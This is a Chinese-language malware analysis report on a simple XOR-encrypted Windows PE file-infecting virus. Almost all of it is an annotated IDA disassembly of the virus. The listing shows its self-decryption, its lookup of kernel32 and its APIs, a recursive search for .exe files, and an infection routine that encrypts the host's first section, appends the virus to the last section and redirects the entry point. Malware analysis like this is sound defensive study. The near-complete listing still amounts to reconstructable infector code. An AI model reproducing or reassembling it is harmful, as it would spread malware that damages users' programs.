有加密的简单病毒
基本信息
报告名称:带加密简单病毒 分析
作者:
报告更新日期: 2012.07.13
样本发现日期:
样本类型:
样本文件大小/被感染文件变化长度: B01h
样本文件MD5 校验值:
样本文件SHA1 校验值:
壳信息:
可能受到威胁的系统:
Microsoft Windows NT 4.0
Microsoft Windows NT 4.0 Terminal Services Edition
Microsoft Windows 2000
Microsoft Windows XP
Microsoft Windows Server 2003
Microsoft Windows vista
Microsoft Windows 7
相关漏洞:
已知检测名称:
简介
针对pe文件病毒
被感染系统及网络症状
程序无法正常启动
文件系统变化
注册表变化
网络症状
详细分析/功能介绍
1 病毒运行后,自身加密,防止查杀,分析。
2 获取相关api搜寻感染目标
3 解密病毒自身,加密被感染问价的第一个节,添加节注入病毒
.text:00401000 ;
.text:00401000 ; +-------------------------------------------------------------------------+
.text:00401000 ; | This file is generated by The Interactive Disassembler (IDA) |
.text:00401000 ; | Copyright (c) 2007 by DataRescue sa/nv, <ida@datarescue.com> |
.text:00401000 ; | Licensed to: Mach EDV Dienstleistungen, Jan Mach, 1 user, adv, 11/2007 |
.text:00401000 ; +-------------------------------------------------------------------------+
.text:00401000 ;
.text:00401000 ; Input MD5 : E75E98DFB5D445B1D79E52AB522E26A4
.text:00401000
.text:00401000 ; File Name : C:\带简单加密的病毒\jiamivirus.exe
.text:00401000 ; Format : Portable executable for 80386 (PE)
.text:00401000 ; Imagebase : 400000
.text:00401000 ; Section 1. (virtual address 00001000)
.text:00401000 ; Virtual size : 00001E2A ( 7722.)
.text:00401000 ; Section size in file : 00002000 ( 8192.)
.text:00401000 ; Offset to raw data for section: 00001000
.text:00401000 ; Flags 60000020: Text Executable Readable
.text:00401000 ; Alignment : default
.text:00401000
.text:00401000 .686p
.text:00401000 .mmx
.text:00401000 .model flat
.text:00401000
.text:00401000 ; ===========================================================================
.text:00401000
.text:00401000 ; Segment type: Pure code
.text:00401000 ; Segment permissions: Read/Execute
.text:00401000 _text segment para public 'CODE' use32
.text:00401000 assume cs:_text
.text:00401000 ;org 401000h
.text:00401000 assume es:nothing, ss:nothing, ds:_data, fs:nothing, gs:nothing
.text:00401000 db 5 dup(0CCh)
.text:00401005 ; ---------------------------------------------------------------------------
.text:00401005 jmp inject
.text:0040100A ; ---------------------------------------------------------------------------
.text:0040100A jmp sub_40124E
.text:0040100F ; ---------------------------------------------------------------------------
.text:0040100F jmp sub_40130A
.text:0040100F ; ---------------------------------------------------------------------------
.text:00401014 db 1Ch dup(0CCh)
.text:00401030
.text:00401030 ; =============== S U B R O U T I N E =======================================
.text:00401030
.text:00401030
.text:00401030 public start
.text:00401030 start proc near ; DATA XREF: inject+1B9r
.text:00401030
.text:00401030 ; FUNCTION CHUNK AT .text:00401233 SIZE 0000001B BYTES
.text:00401030
.text:00401030 call $+5
.text:00401035
.text:00401035 loc_401035: ; DATA XREF: start+6o
.text:00401035 pop ebp
.text:00401036 sub ebp, offset loc_401035
.text:0040103C lea esi, dword_401062[ebp]
.text:00401042 lea edi, dword_401062[ebp]
.text:00401048 mov ecx, 0B01h//循环次数
.text:0040104D mov bl, ss:byte_40165F[ebp]
加密病毒本身
.text:00401053
.text:00401053 loc_401053: ; CODE XREF: start+2Ej
.text:00401053 or ecx, ecx ; for(i=ecx,i>0;i++)
.text:00401053 ; {
.text:00401053 ; al=40165f[i];
.text:00401053 ; al=xor al,bl;
.text:00401053 ; 40186f[i]=al;
.text:00401053 ; }
.text:00401055 jnz short loc_401059
.text:00401057 jmp short loc_401060 ;
.text:00401059 ; ---------------------------------------------------------------------------
.text:00401059
.text:00401059 loc_401059: ; CODE XREF: start+25j
.text:00401059 lodsb
.text:0040105A xor al, bl
.text:0040105C stosb
.text:0040105D dec ecx
.text:0040105E jmp short loc_401053 ; for(i=ecx,i>0;i++)
.text:0040105E ; {
.text:0040105E ; al=40165f[i];
.text:0040105E ; al=xor al,bl;
.text:0040105E ; 40186f[i]=al;
.text:0040105E ; }
.text:00401060 ; ---------------------------------------------------------------------------
.text:00401060
.text:00401060 loc_401060: ; CODE XREF: start+27j
.text:00401060 jmp short loc_401068 ;
.text:00401060 ; ---------------------------------------------------------------------------
.text:00401062 dword_401062 dd 72616863h ; DATA XREF: start+Cr
.text:00401062 ; start+12r ...
.text:00401066 dw 656Dh
.text:00401068 ; ---------------------------------------------------------------------------
.text:00401068
.text:00401068 loc_401068: ; CODE XREF: start:loc_401060j
.text:00401068 mov esi, ss:image_base[ebp]
.text:0040106E mov edi, esi
.text:00401070 mov ecx, ss:virtualsize[ebp]
.text:00401076
.text:00401076 loc_401076: ; CODE XREF: start+51j
.text:00401076 or ecx, ecx
.text:00401078 jnz short loc_40107C
.text:0040107A jmp short loc_401083
.text:0040107C ; ---------------------------------------------------------------------------
.text:0040107C
.text:0040107C loc_40107C: ; CODE XREF: start+48j
.text:0040107C lodsb
.text:0040107D xor al, bl
.text:0040107F stosb
.text:00401080 dec ecx
.text:00401081 jmp short loc_401076
搜索 kernel,搜索api
.text:00401083 ; ---------------------------------------------------------------------------
.text:00401083
.text:00401083 loc_401083: ; CODE XREF: start+4Aj
.text:00401083 mov ss:byte_40165F[ebp], bl
.text:00401089 mov eax, [esp+0]
.text:0040108C and eax, 0FFFFF000h
.text:00401091
.text:00401091 loc_401091: ; CODE XREF: start+6Dj
.text:00401091 cmp word ptr [eax], 'ZM'
.text:00401096 jz short loc_40109F ; 查找成功跳转
.text:00401098 sub eax, 1000h ; 第一种方式查找kernel
.text:0040109D jmp short loc_401091
.text:0040109F ; ---------------------------------------------------------------------------
.text:0040109F
.text:0040109F loc_40109F: ; CODE XREF: start+66j
.text:0040109F mov ss:peheader[ebp], eax
.text:004010A5 lea esi, byte_40166D[ebp]
.text:004010AB call get_api_process ; 在导出表中搜索需要的api
.text:004010B0 mov ss:dword_401679[ebp], eax
.text:004010B6 mov eax, ss:peheader[ebp]
.text:004010BC lea esi, byte_40171F[ebp]
.text:004010C2 call get_api_process ; 在导出表中搜索需要的api
.text:004010C7 mov dword ptr ss:find_firstfile[ebp], eax
.text:004010CD mov eax, ss:peheader[ebp]
.text:004010D3 lea esi, byte_4016B4[ebp]
.text:004010D9 call get_api_process ; 在导出表中搜索需要的api
.text:004010DE mov ss:setcurrentdirectory[ebp], eax
.text:004010E4 mov eax, ss:peheader[ebp]
.text:004010EA lea esi, dword_401731[ebp]
.text:004010F0 call get_api_process ; 在导出表中搜索需要的api
.text:004010F5 mov ss:getfileatributes[ebp], eax
.text:004010FB mov eax, ss:peheader[ebp]
.text:00401101 lea esi, dword_401747[ebp]
.text:00401107 call get_api_process ; 在导出表中搜索需要的api
.text:0040110C mov ss:find_nexttfile[ebp], eax
.text:00401112 mov eax, ss:peheader[ebp]
.text:00401118 lea esi, dword_401758[ebp]
.text:0040111E call get_api_process ; 在导出表中搜索需要的api
.text:00401123 mov ss:dword_401762[ebp], eax
.text:00401129 mov eax, ss:peheader[ebp]
.text:0040112F lea esi, dword_40167D[ebp]
.text:00401135 call get_api_process ; 在导出表中搜索需要的api
.text:0040113A mov ss:dword_401688[ebp], eax
.text:00401140 mov eax, ss:peheader[ebp]
.text:00401146 lea esi, dword_401766[ebp]
.text:0040114C call get_api_process ; 在导出表中搜索需要的api
.text:00401151 mov ss:dword_40176E[ebp], eax
.text:00401157 mov eax, ss:peheader[ebp]
.text:0040115D lea esi, dword_40170F[ebp]
.text:00401163 call get_api_process ; 在导出表中搜索需要的api
.text:00401168 mov ss:getfilesize[ebp], eax
.text:0040116E mov eax, ss:peheader[ebp]
.text:00401174 lea esi, aCreatefilemapp[ebp] ; "CreateFileMapping"
.text:0040117A call get_api_process ; 在导出表中搜索需要的api
.text:0040117F mov ss:creatfile_map[ebp], eax
.text:00401185 mov eax, ss:peheader[ebp]
.text:0040118B lea esi, dword_4016A2[ebp]
.text:00401191 call get_api_process ; 在导出表中搜索需要的api
.text:00401196 mov ss:viewoffile[ebp], eax
.text:0040119C mov eax, ss:peheader[ebp]
.text:004011A2 lea esi, dword_4016CC[ebp]
.text:004011A8 call get_api_process ; 在导出表中搜索需要的api
.text:004011AD mov ss:dword_4016D8[ebp], eax
.text:004011B3 mov eax, ss:peheader[ebp]
.text:004011B9 lea esi, dword_4016EB[ebp]
.text:004011BF call get_api_process ; 在导出表中搜索需要的api
.text:004011C4 mov ss:dword_4016FB[ebp], eax
.text:004011CA mov eax, ss:peheader[ebp]
.text:004011D0 lea esi, dword_4016FF[ebp]
.text:004011D6 call get_api_process ; 在导出表中搜索需要的api
.text:004011DB mov ss:dword_40170B[ebp], eax
.text:004011E1 jmp short loc_401233
.text:004011E1 start endp
.text:004011E1
.text:004011E3
.text:004011E3 ; =============== S U B R O U T I N E =======================================
.text:004011E3
在导出表中搜索需要的api
.text:004011E3 ;
.text:004011E3
.text:004011E3 get_api_process proc near ; CODE XREF: start+7Bp
.text:004011E3 ; start+92p ...
.text:004011E3 mov ebx, [eax+3Ch]
.text:004011E6 add ebx, eax
.text:004011E8 add ebx, 78h ; ebx fileheader
.text:004011EB mov ebx, [ebx] ; ebx datadirectory
.text:004011ED add ebx, eax
.text:004011EF xor edx, edx
.text:004011F1 mov ecx, [ebx+20h]
.text:004011F4 add ecx, eax ; ecx addressofname
.text:004011F6 push esi
.text:004011F7 push edx
.text:004011F8
.text:004011F8 loc_4011F8: ; CODE XREF: get_api_process+27j
.text:004011F8 pop edx
.text:004011F9 pop esi
.text:004011FA inc edx
.text:004011FB mov edi, [ecx] ; 输出地址表起始地址
.text:004011FD add edi, eax
.text:004011FF add ecx, 4 ; 输出名称表
.text:00401202 push esi
.text:00401203 push edx
.text:00401204
.text:00401204 loc_401204: ; CODE XREF: get_api_process+30j
.text:00401204 mov dl, [edi]
.text:00401206 mov dh, [esi]
.text:00401208 cmp dl, dh
.text:0040120A jnz short loc_4011F8
.text:0040120C inc edi
.text:0040120D inc esi
.text:0040120E cmp byte ptr [esi], 0
.text:00401211 jz short loc_401215
.text:00401213 jmp short loc_401204
.text:00401215 ; ---------------------------------------------------------------------------
.text:00401215
.text:00401215 loc_401215: ; CODE XREF: get_api_process+2Ej
.text:00401215 pop edx
.text:00401216 pop esi
.text:00401217 dec edx
.text:00401218 shl edx, 1
.text:0040121A mov ecx, [ebx+24h]
.text:0040121D add ecx, eax
.text:0040121F add ecx, edx
.text:00401221 xor edx, edx
.text:00401223 mov dx, [ecx]
.text:00401226 shl edx, 2
.text:00401229 mov ecx, [ebx+1Ch]
.text:0040122C add ecx, eax
.text:0040122E add ecx, edx
.text:00401230 add eax, [ecx]
.text:00401232 retn
.text:00401232 get_api_process endp
.text:00401232
.text:00401233 ; ---------------------------------------------------------------------------
.text:00401233 ; START OF FUNCTION CHUNK FOR start
转换当前位置寻找感染目标
.text:00401233
.text:00401233 loc_401233: ; CODE XREF: start+1B1j
.text:00401233 lea esi, directroy_path[ebp]
.text:00401239 push esi
.text:0040123A mov eax, ss:setcurrentdirectory[ebp]
.text:00401240 call eax
.text:00401242 push ebp
.text:00401243 call sub_40130A ; 搜索文件函数
.text:00401248 pop ebp
.text:00401249 jmp nullsub_1
.text:00401249 ; END OF FUNCTION CHUNK FOR start
.text:0040124E
.text:0040124E ; =============== S U B R O U T I N E =======================================
.text:0040124E
.text:0040124E
.text:0040124E sub_40124E proc near ; CODE XREF: .text:0040100Aj
.text:0040124E ; sub_40130A+66p ...
.text:0040124E lea eax, dword_401A12[ebp]
.text:00401254 push eax
.text:00401255 lea eax, byte_401893[ebp]
.text:0040125B push eax
.text:0040125C mov eax, dword ptr ss:find_firstfile[ebp]
.text:00401262 call eax
.text:00401264 mov ss:dword_4018A4[ebp], eax
.text:0040126A cmp eax, 0FFFFFFFFh
.text:0040126D jnz short loc_401279
.text:0040126F mov eax, 0FFFFFFFFh
.text:00401274 jmp locret_401309
.text:00401279 ; ---------------------------------------------------------------------------
.text:00401279
.text:00401279 loc_401279: ; CODE XREF: sub_40124E+1Fj
.text:00401279 lea esi, dword_401A12[ebp]
.text:0040127F lea eax, [esi+2Ch]
.text:00401282 mov esi, eax
.text:00401284 lodsb
.text:00401285 cmp al, '.'
.text:00401287 jnz short loc_40128B
.text:00401289 jmp short loc_4012B2
.text:0040128B ; ---------------------------------------------------------------------------
.text:0040128B
.text:0040128B loc_40128B: ; CODE XREF: sub_40124E+39j
.text:0040128B lea esi, dword_401A12[ebp]
.text:00401291 lea eax, [esi+2Ch]
.text:00401294 push eax
.text:00401295 push eax
.text:00401296 mov eax, ss:getfileatributes[ebp]
.text:0040129C call eax
.text:0040129E cmp eax, 10h
.text:004012A1 jz short loc_4012B1
.text:004012A3 pop eax
.text:004012A4 mov ss:filename[ebp], eax
.text:004012AA call inject
.text:004012AF jmp short loc_4012B2
.text:004012B1 ; ---------------------------------------------------------------------------
.text:004012B1
.text:004012B1 loc_4012B1: ; CODE XREF: sub_40124E+53j
.text:004012B1 pop eax
.text:004012B2
.text:004012B2 loc_4012B2: ; CODE XREF: sub_40124E+3Bj
.text:004012B2 ; sub_40124E+61j ...
.text:004012B2 lea esi, dword_401A12[ebp]
.text:004012B8 push esi
.text:004012B9 mov esi, ss:dword_4018A4[ebp]
.text:004012BF push esi
.text:004012C0 mov eax, ss:find_nexttfile[ebp]
.text:004012C6 call eax
.text:004012C8 or eax, eax
.text:004012CA jnz short loc_4012CE
.text:004012CC jmp short locret_401309
.text:004012CE ; ---------------------------------------------------------------------------
.text:004012CE
.text:004012CE loc_4012CE: ; CODE XREF: sub_40124E+7Cj
.text:004012CE lea esi, dword_401A12[ebp]
.text:004012D4 lea eax, [esi+2Ch]
.text:004012D7 mov esi, eax
.text:004012D9 lodsb
.text:004012DA cmp al, 2Eh
.text:004012DC jnz short loc_4012E0
.text:004012DE jmp short loc_4012B2
.text:004012E0 ; ---------------------------------------------------------------------------
.text:004012E0
.text:004012E0 loc_4012E0: ; CODE XREF: sub_40124E+8Ej
.text:004012E0 lea esi, dword_401A12[ebp]
.text:004012E6 lea eax, [esi+2Ch]
.text:004012E9 push eax
.text:004012EA push eax
.text:004012EB mov eax, ss:getfileatributes[ebp]
.text:004012F1 call eax
.text:004012F3 cmp eax, 10h
.text:004012F6 jz short loc_401306
.text:004012F8 pop eax
.text:004012F9 mov ss:filename[ebp], eax
.text:004012FF call inject//////////////符合要求进行感染
.text:00401304 jmp short loc_401307
.text:00401306 ; ---------------------------------------------------------------------------
.text:00401306
.text:00401306 loc_401306: ; CODE XREF: sub_40124E+A8j
.text:00401306 pop eax
.text:00401307
.text:00401307 loc_401307: ; CODE XREF: sub_40124E+B6j
.text:00401307 jmp short loc_4012B2
.text:00401309 ; ---------------------------------------------------------------------------
.text:00401309
.text:00401309 locret_401309: ; CODE XREF: sub_40124E+26j
.text:00401309 ; sub_40124E+7Ej
.text:00401309 retn
.text:00401309 sub_40124E endp
.text:00401309
.text:0040130A
.text:0040130A ; =============== S U B R O U T I N E =======================================
.text:0040130A
.text:0040130A
.text:0040130A sub_40130A proc near ; CODE XREF: .text:0040100Fj
.text:0040130A ; start+213p
.text:0040130A lea esi, file_data_stru[ebp]
.text:00401310 push esi
.text:00401311 lea esi, word_40188F[ebp] ; ;exe文件
.text:00401317 push esi
.text:00401318 mov eax, dword ptr ss:find_firstfile[ebp]
.text:0040131E call eax
.text:00401320 mov ss:file_handle[ebp], eax
.text:00401326 cmp eax, 0FFFFFFFFh
.text:00401329 jnz short loc_401335
.text:0040132B mov eax, 0FFFFFFFFh
.text:00401330 jmp locret_4013F1
.text:00401335 ; ---------------------------------------------------------------------------
.text:00401335
.text:00401335 loc_401335: ; CODE XREF: sub_40130A+1Fj
.text:00401335 lea esi, file_data_stru[ebp]
.text:0040133B lea eax, [esi+2Ch]
.text:0040133E mov esi, eax
.text:00401340 lodsb
.text:00401341 cmp al, '.'
.text:00401343 jnz short loc_401347
.text:00401345 jmp short loc_401384
.text:00401347 ; ---------------------------------------------------------------------------
.text:00401347
.text:00401347 loc_401347: ; CODE XREF: sub_40130A+39j
.text:00401347 lea esi, file_data_stru[ebp]
.text:0040134D lea eax, [esi+2Ch]
.text:00401350 push eax
.text:00401351 mov eax, ss:getfileatributes[ebp] ; 为指定文件或目录返回系统属性
.text:00401357 call eax
.text:00401359 cmp eax, 10h ; 判断是否为目录
.text:0040135C jnz short loc_401384
.text:0040135E lea esi, file_data_stru[ebp] ; 是目录
.text:00401364 lea eax, [esi+2Ch]
.text:00401367 push eax
.text:00401368 mov eax, ss:setcurrentdirectory[ebp]
.text:0040136E call eax
.text:00401370 call sub_40124E ; 进入目录继续搜索文件
.text:00401375 lea eax, dword_401899[ebp]
.text:0040137B push eax
.text:0040137C mov eax, ss:setcurrentdirectory[ebp]
.text:00401382 call eax ; 返回上一级
.text:00401384
.text:00401384 loc_401384: ; CODE XREF: sub_40130A+3Bj
.text:00401384 ; sub_40130A+52j ...
.text:00401384 lea esi, file_data_stru[ebp]
.text:0040138A push esi
.text:0040138B mov eax, ss:file_handle[ebp]
.text:00401391 push eax
.text:00401392 mov eax, ss:find_nexttfile[ebp]
.text:00401398 call eax
.text:0040139A or eax, eax
.text:0040139C jnz short loc_4013A0
.text:0040139E jmp short locret_4013F1
.text:004013A0 ; ---------------------------------------------------------------------------
.text:004013A0
.text:004013A0 loc_4013A0: ; CODE XREF: sub_40130A+92j
.text:004013A0 lea esi, file_data_stru[ebp]
.text:004013A6 lea eax, [esi+2Ch]
.text:004013A9 mov esi, eax
.text:004013AB lodsb
.text:004013AC cmp al, '.'
.text:004013AE jnz short loc_4013B2
.text:004013B0 jmp short loc_401384
.text:004013B2 ; ---------------------------------------------------------------------------
.text:004013B2
.text:004013B2 loc_4013B2: ; CODE XREF: sub_40130A+A4j
.text:004013B2 lea esi, file_data_stru[ebp]
.text:004013B8 lea eax, [esi+2Ch]
.text:004013BB push eax
.text:004013BC mov eax, ss:getfileatributes[ebp]
.text:004013C2 call eax
.text:004013C4 cmp eax, 10h
.text:004013C7 jnz short loc_4013EF
.text:004013C9 lea esi, file_data_stru[ebp]
.text:004013CF lea eax, [esi+2Ch]
.text:004013D2 push eax
.text:004013D3 mov eax, ss:setcurrentdirectory[ebp]
.text:004013D9 call eax
.text:004013DB call sub_40124E
.text:004013E0 lea eax, dword_401899[ebp]
.text:004013E6 push eax
.text:004013E7 mov eax, ss:setcurrentdirectory[ebp]
.text:004013ED call eax
.text:004013EF
.text:004013EF loc_4013EF: ; CODE XREF: sub_40130A+BDj
.text:004013EF jmp short loc_401384
.text:004013F1 ; ---------------------------------------------------------------------------
.text:004013F1
.text:004013F1 locret_4013F1: ; CODE XREF: sub_40130A+26j
.text:004013F1 ; sub_40130A+94j
.text:004013F1 retn
.text:004013F1 sub_40130A endp
.text:004013F1
.text:004013F2
.text:004013F2 ; =============== S U B R O U T I N E =======================================
.text:004013F2
感染主体
.text:004013F2
.text:004013F2 inject proc near ; CODE XREF: .text:00401005j
.text:004013F2 ; sub_40124E+5Cp ...
.text:004013F2 push 0
.text:004013F4 push 80h
.text:004013F9 push 4
.text:004013FB push 0
.text:004013FD push 3
.text:004013FF push 0C0000000h
.text:00401404 mov eax, ss:filename[ebp]
.text:0040140A push eax
.text:0040140B mov eax, ss:dword_401688[ebp]
.text:00401411 call eax
.text:00401413 mov ss:(dword_401899+3)[ebp], eax
.text:00401419 push 0
.text:0040141B push eax
.text:0040141C mov eax, ss:getfilesize[ebp]
.text:00401422 call eax
.text:00401424 add eax, 0B33h
.text:00401429 add eax, 1000h
.text:0040142E mov ss:dword_401B5F[ebp], eax
.text:00401434 push 0
.text:00401436 mov eax, ss:dword_401B5F[ebp]
.text:0040143C push eax
.text:0040143D push 0
.text:0040143F push 4
.text:00401441 push 0
.text:00401443 mov eax, ss:(dword_401899+3)[ebp]
.text:00401449 push eax
.text:0040144A mov eax, ss:creatfile_map[ebp]
.text:00401450 call eax
.text:00401452 mov ss:dword_4018A8[ebp], eax ; 返回文件映射对象的句柄
.text:00401458 push ss:dword_401B5F[ebp]
.text:0040145E push 0
.text:00401460 push 0
.text:00401462 push 2
.text:00401464 mov eax, ss:dword_4018A8[ebp]
.text:0040146A push eax
.text:0040146B mov eax, ss:viewoffile[ebp]
.text:00401471 call eax
.text:00401473 mov ss:map_base[ebp], eax
.text:00401479 mov edi, eax
.text:0040147B xor eax, eax
.text:0040147D mov ax, [edi]
.text:00401480 add edi, [edi+3Ch]
.text:00401483 add edi, 4
.text:00401486 xor ecx, ecx
.text:00401488 mov cx, [edi+2]
.text:0040148C mov ss:num_of_section[ebp], ecx
.text:00401492 add edi, 14h
.text:00401495 mov ss:option_header[ebp], edi
.text:0040149B mov eax, [edi+1Ch]
.text:0040149E mov ss:image_base[ebp], eax
.text:004014A4 add eax, [edi+10h]
.text:004014A7 mov ss:entry_add[ebp], eax
.text:004014AD mov eax, [edi+24h]
.text:004014B0 mov ss:filealign[ebp], eax
.text:004014B6 add edi, 0E0h
.text:004014BC xor esi, esi
.text:004014BE
.text:004014BE loc_4014BE: ; CODE XREF: inject+112j
.text:004014BE or ecx, ecx
.text:004014C0 jnz short loc_4014C4 ; 来到第一个节
.text:004014C2 jmp short loc_401506 ; 来到最后一个节
.text:004014C4 ; ---------------------------------------------------------------------------
.text:004014C4
.text:004014C4 loc_4014C4: ; CODE XREF: inject+CEj
.text:004014C4 or esi, esi ; 来到第一个节
.text:004014C6 jnz short loc_4014F6
.text:004014C8 mov eax, [edi+14h]
.text:004014CB mov ss:point_to_rawdata[ebp], eax
.text:004014D1 mov eax, [edi+0Ch]
.text:004014D4 add ss:image_base[ebp], eax
.text:004014DA mov eax, [edi+8]
.text:004014DD mov ss:virtualsize[ebp], eax
.text:004014E3 mov al, [edi]
.text:004014E5 mov ss:sectionname[ebp], al
.text:004014EB mov eax, [edi+24h]
.text:004014EE or eax, 0A0000020h
.text:004014F3 mov [edi+24h], eax ; 节属性异或对第一个节进行加密
.text:004014F6
.text:004014F6 loc_4014F6: ; CODE XREF: inject+D4j
.text:004014F6 cmp [edi+14h], esi
.text:004014F9 jbe short loc_401500
.text:004014FB mov esi, [edi+14h]
.text:004014FE mov eax, edi
.text:00401500
.text:00401500 loc_401500: ; CODE XREF: inject+107j
.text:00401500 add edi, 28h
.text:00401503 dec ecx
.text:00401504 jmp short loc_4014BE
.text:00401506 ; ---------------------------------------------------------------------------
.text:00401506
.text:00401506 loc_401506: ; CODE XREF: inject+D0j
.text:00401506 mov edi, eax ; 来到最后一个节
增加节注入病毒
.text:00401508 mov ebx, [edi+8]
.text:0040150B add ebx, 0B33h
.text:00401511 add ebx, 7
.text:00401514 mov [edi+8], ebx ; 扩大virtualsize
.text:00401517 push edi
.text:00401518 lea eax, [edi]
.text:0040151A mov edi, eax
.text:0040151C mov al, 2Eh
.text:0040151E stosb
.text:0040151F mov al, 74h
.text:00401521 stosb
.text:00401522 mov al, 65h
.text:00401524 stosb
.text:00401525 mov al, 78h
.text:00401527 stosb
.text:00401528 mov al, 74h
.text:0040152A stosb
.text:0040152B mov al, 0
.text:0040152D stosb
.text:0040152E pop edi ; 重新写节的名称
.text:0040152F xor edx, edx
.text:00401531 mov eax, ebx
.text:00401533 mov ebx, ss:filealign[ebp]
.text:00401539 div ebx
.text:0040153B or edx, edx
.text:0040153D jnz short loc_401544 ; 对齐函数
.text:0040153F mov eax, [edi+8]
.text:00401542 jmp short loc_401565
.text:00401544 ; ---------------------------------------------------------------------------
.text:00401544
.text:00401544 loc_401544: ; CODE XREF: inject+14Bj
.text:00401544 mov eax, [edi+8] ; 对齐函数
.text:00401547 mov ebx, ss:filealign[ebp]
.text:0040154D push ebx
.text:0040154E xor ecx, ecx
.text:00401550 mov edx, eax
.text:00401552
.text:00401552 loc_401552: ; CODE XREF: inject:loc_40155Cj
.text:00401552 inc ecx
.text:00401553 shr ebx, 1
.text:00401555 or ebx, ebx
.text:00401557 jnz short loc_40155C
.text:00401559 dec ecx
.text:0040155A jmp short loc_40155E
.text:0040155C ; ---------------------------------------------------------------------------
.text:0040155C
.text:0040155C loc_40155C: ; CODE XREF: inject+165j
.text:0040155C jmp short loc_401552
.text:0040155E ; ---------------------------------------------------------------------------
.text:0040155E
.text:0040155E loc_40155E: ; CODE XREF: inject+168j
.text:0040155E sar eax, cl
.text:00401560 shl eax, cl
.text:00401562 pop ebx
.text:00401563 add eax, ebx
.text:00401565
.text:00401565 loc_401565: ; CODE XREF: inject+150j
.text:00401565 mov ebx, [edi+10h]
.text:00401568 mov [edi+10h], eax ; 修改文件对齐大小
.text:0040156B sub eax, ebx
.text:0040156D shr eax, 0Ch
.text:00401570 shl eax, 0Ch
.text:00401573 mov ss:dword_4018CC[ebp], eax ; ???????????????
.text:00401573 ; 如果差值大于2……12次方就不变否则清0了
.text:00401579 mov eax, [edi+24h]
.text:0040157C or eax, 0A0000020h ; 还原之前的属性
.text:00401581 mov [edi+24h], eax
.text:00401584 mov esi, [edi+0Ch]
.text:00401587 add esi, [edi+8]
.text:0040158A sub esi, 0B33h
.text:00401590 sub esi, 7
.text:00401593 push esi ; 原来的virtualsize
.text:00401594 mov esi, [edi+14h]
.text:00401597 add esi, [edi+8]
.text:0040159A sub esi, 0B33h
.text:004015A0 sub esi, 7
.text:004015A3 mov edi, esi ; 还原原来的pointtorawdata
.text:004015A5 add edi, ss:map_base[ebp]
.text:004015AB lea esi, start[ebp]
.text:004015B1 mov ecx, 32h ; 写入节内容
.text:004015B6 rep movsb
.text:004015B8 lea esi, dword_401062[ebp]
.text:004015BE mov ecx, 0B01h
.text:004015C3 mov bl, ss:byte_40165F[ebp]
.text:004015C9 inc bl
.text:004015CB xor al, al
.text:004015CD mov ss:byte_40165F[ebp], al
.text:004015D3
.text:004015D3 loc_4015D3: ; CODE XREF: inject+1ECj
.text:004015D3 or ecx, ecx
.text:004015D5 jnz short loc_4015D9
.text:004015D7 jmp short loc_4015E0
.text:004015D9 ; ---------------------------------------------------------------------------
.text:004015D9
解密
.text:004015D9 loc_4015D9: ; CODE XREF: inject+1E3j
.text:004015D9 lodsb
.text:004015DA xor al, bl ; 异或解密
.text:004015DC stosb
.text:004015DD dec ecx
.text:004015DE jmp short loc_4015D3
.text:004015E0 ; ---------------------------------------------------------------------------
.text:004015E0
.text:004015E0 loc_4015E0: ; CODE XREF: inject+1E5j
.text:004015E0 push edi
.text:004015E1 mov esi, ss:point_to_rawdata[ebp]
.text:004015E7 add esi, ss:map_base[ebp]
.text:004015ED mov edi, esi
.text:004015EF mov ecx, ss:virtualsize[ebp]
.text:004015F5
.text:004015F5 loc_4015F5: ; CODE XREF: inject+20Ej
.text:004015F5 or ecx, ecx ; 循环
.text:004015F7 jnz short loc_4015FB
.text:004015F9 jmp short loc_401602
.text:004015FB ; ---------------------------------------------------------------------------
.text:004015FB
.text:004015FB loc_4015FB: ; CODE XREF: inject+205j
.text:004015FB lodsb
.text:004015FC xor al, bl
.text:004015FE stosb
.text:004015FF dec ecx
.text:00401600 jmp short loc_4015F5 ; 加密第一个节
.text:00401602 ; ---------------------------------------------------------------------------
.text:00401602
.text:00401602 loc_401602: ; CODE XREF: inject+207j
.text:00401602 pop edi
.text:00401603 mov al, 0B8h
.text:00401605 stosb
.text:00401606 mov eax, ss:entry_add[ebp]
.text:0040160C stosd
.text:0040160D mov ax, 0D0FFh
.text:00401611 stosw
.text:00401613 mov edi, ss:option_header[ebp]
.text:00401619 pop eax
.text:0040161A mov [edi+10h], eax
.text:0040161D pop eax
.text:0040161E mov ebx, [edi+38h]
.text:00401621 mov eax, ss:dword_4018CC[ebp]
.text:00401627 add ebx, eax
.text:00401629 mov [edi+38h], ebx
.text:0040162C mov eax, ss:map_base[ebp]
.text:00401632 push eax
.text:00401633 mov eax, ss:dword_4016FB[ebp]
.text:00401639 call eax
.text:0040163B mov eax, ss:dword_4018A8[ebp]
.text:00401641 push eax
.text:00401642 mov eax, ss:dword_40170B[ebp]
.text:00401648 call eax
.text:0040164A mov eax, ss:(dword_401899+3)[ebp]
.text:00401650 push eax
.text:00401651 mov eax, ss:dword_40170B[ebp]
.text:00401657 call eax
.text:00401659 retn
.text:00401659 inject endp
.text:00401659